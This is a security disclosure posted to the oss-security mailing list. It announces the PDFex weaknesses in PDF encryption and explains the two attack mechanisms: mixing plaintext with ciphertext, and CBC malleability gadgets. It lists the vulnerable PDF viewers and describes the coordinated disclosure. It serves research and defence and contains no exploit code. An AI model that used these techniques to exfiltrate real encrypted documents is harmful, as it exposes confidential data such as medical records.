|
Message-ID: <eec1e835-fd6c-5c7c-25b8-5684ce8efafc@rub.de> Date: Tue, 1 Oct 2019 10:48:07 +0200 From: Jens Müller <jens.a.mueller@....de> To: oss-security@...ts.openwall.com Subject: PDFex: Security weakness in PDF encryption TL;DR In the scope of academic research at Ruhr University Bochum and Münster and University of Applied Sciences, Germany, two severe flaws in the PDF encryption standard have been discovered, which both lead to full plaintext exfiltration in an active-attacker scenario. * Website, including proof-of-concept exploits: pdf-insecurity.org * Paper: pdf-insecurity.org/download/paper-pdf_encryption-ccs2019.pdf *How to break PDF Encryption* ----------------------------- To guarantee confidentiality, PDF files can be encrypted. This enables the secure transfer and storing of sensitive documents without any further protection mechanisms. The key management between the sender and recipient may be password based (the recipient must know the password used by the sender, or it must be transferred to them through a secure channel) or public key based (i.e., the sender knows the X.509 certificate of the recipient). In this research, we analyze the security of encrypted PDF documents and show how an attacker can exfiltrate the content without having the corresponding keys. *So what is the problem?* ------------------------- The security problems known as "PDFex" can be summarized as follows: * 1. Even without knowing the corresponding password, the attacker possessing an encrypted PDF file can manipulate parts of it. More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file. * 2. PDF encryption uses the Cipher Block Chaining (CBC) encryption mode with no integrity checks, which implies ciphertext malleability. This allows an attacker to create self-exfiltrating ciphertext using CBC malleability gadgets. We use this technique not only to modify existing plaintext but to construct entirely new encrypted objects. *How bad is it?* --------------- In order to measure the impact of the vulnerabilities in the PDF specification, we analyzed 27 widely used PDF viewers. We found 23 of them (85%) to be vulnerable to direct exfiltration attacks and all of them to be vulnerable to CBC gadgets. You can find the detailed results of our evaluation below. Application Version tested Direct Exfiltration CBC Gadgets ----------------------------------------------------------------------- Adobe Acrobat DC 2019.008.20081 [XX] [X] Foxit Reader 9.2.0.9297 [X] [X] PDF-XChange Viewer 2.5.322.9 [XX] [X] Perfect PDF Reader 8.0.3.5 [XX] [XX] PDF Studio Viewer 2018.1.0 [XX] [XX] Nitro Reader 5.5.9.2 [X] [XX] Acrobat Pro DC 2017.011.30127 [XX] [X] Foxit PhantomPDF 9.5.0.20723 [X] [X] PDF-XChange Editor 7.0.326.1 [XX] [X] Perfect PDF Premium 10.0.0.1 [XX] [XX] PDF Studio Pro 12.0.7 [XX] [XX] Nitro Pro 12.2.0.228 [XX] [XX] Nuance Power PDF 3.0.0.17 [XX] [X] iSkysoft PDF Editor 6.4.2.3521 [X] [X] Master PDF Editor 5.1.36 [XX] [XX] Soda PDF Desktop 11.0.16.2797) [X] [X] PDF Architect 7.0.23.3193 [X] [X] PDFelement 6.8.0.3523 [X] [X] ----------------------------------------------------------------------- Preview 3.32.0 - [X] Skim 1.4.37 - [X] ----------------------------------------------------------------------- Evince 10.0.944.4 [X] [X] Okular 1.7.3 [X] [X] MuPDF 1.14.0 [X] [X] ----------------------------------------------------------------------- Chrome 70.0.3538.67 [XX] [XX] Firefox 66.0.2 - [X] Safari 11.0.3 - [X] Opera 57.0.3098.106 [XX] [XX] ----------------------------------------------------------------------- [XX] | Insecure: Exfiltration (no user interaction) [X] | Insecure: Exfiltration (with user interaction) - | Secure: No exfiltration / not vulnerable *How can I protect myself?* --------------------------- We strictly followed the responsible disclosure procedure by reporting the results on 17th of May 2019. In cooperation with the BSI-CERT, we contacted all vendors, provided proof-of-concept exploits, and helped them to mitigate the issues. *Who uses PDF Encryption?* -------------------------- PDF encryption is deployed in many areas to securely exchange confidential information via the Internet. Various medical IT systems and devices are capable, for example, of encrypting and transferring medical records as PDF files. MFPs also provide PDF encryption to protect scanned documents. In business environments, emails are sometimes sent as encrypted PDF documents when other encryption methods are not available (e.g., various organizations use special gateways to automatically encrypt email messages as encrypted PDF attachments).
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.